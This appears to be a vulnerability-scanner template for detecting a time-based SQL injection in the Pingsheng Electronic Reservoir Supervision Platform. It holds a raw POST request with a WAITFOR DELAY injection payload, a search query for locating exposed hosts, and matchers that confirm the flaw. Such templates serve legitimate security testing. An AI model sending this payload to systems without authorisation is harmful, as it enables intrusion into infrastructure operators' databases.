36 lines
1.6 KiB
YAML
36 lines
1.6 KiB
YAML
id: pingsheng-electronic-sqli
|
|
|
|
info:
|
|
name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
|
|
author: securityforeveryone
|
|
severity: high
|
|
description: |
|
|
There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
|
|
reference:
|
|
- https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
|
- https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
fofa-query: "js/PSExtend.js"
|
|
tags: sqli,pingsheng
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout 20s
|
|
POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'contains_all(body,"Result","false","Message")'
|
|
- 'contains(content_type,"text/xml")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a004730450220496311996edc771bcc56eb44c74ed2d48fe8a4d19fbe73b626b9ec4807aaa6e5022100ee7b686afbd156f43d0e1f827405e71e15f4a33638379d8d119fe06955e236b1:922c64590222798bb761d5b6d8e72950 |